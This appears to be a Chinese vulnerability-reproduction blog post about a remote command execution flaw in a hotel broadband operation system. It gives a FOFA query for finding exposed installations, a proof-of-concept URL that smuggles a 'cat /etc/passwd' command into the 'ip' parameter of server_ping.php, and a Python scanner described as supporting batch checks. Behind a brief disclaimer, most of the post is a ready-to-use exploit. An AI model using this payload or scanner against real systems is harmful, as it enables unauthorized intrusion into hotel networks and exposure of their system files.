漏洞复现-酒店宽带运营系统RCE

admin 2021年9月29日23:22:59评论568 views字数 708阅读2分21秒阅读模式

免责声明:

由于传播、利用此文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任何责任。切勿用于未授权测试!本文主要来自日常学习记录


FOFA语句:

title="酒店宽带运营"


POC:

http://url/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1


脚本代码:

def poc(url):  print("-"*50)  print("开始检测: "+url)  target = url+"/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"  r = requests.get(url=target,timeout=8,verify=False)  if r.status_code ==200 and "parent.doTestResult" in r.text:    print(url+"  漏洞存在!")    print("请访问:"+url+"/Test.txt")    print("-"*50)    print("n")  else:    print(url+"  漏洞不存在!")    print("-"*50)    print("n")


利用截图:

漏洞复现-酒店宽带运营系统RCE

漏洞复现-酒店宽带运营系统RCE

支持批量检测!


利用说明:

检测成功后,若存在漏洞,会向Test.txt文件写入cat /etc/passwd的内容,访问url/Test.txt即可访问到内容!回复:酒店宽带运营系统RCE 即可获取脚本!

本文始发于微信公众号(Fight Tigers Team):漏洞复现-酒店宽带运营系统RCE

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月29日23:22:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现-酒店宽带运营系统RCEhttp://cn-sec.com/archives/365437.html

发表评论

匿名网友 填写信息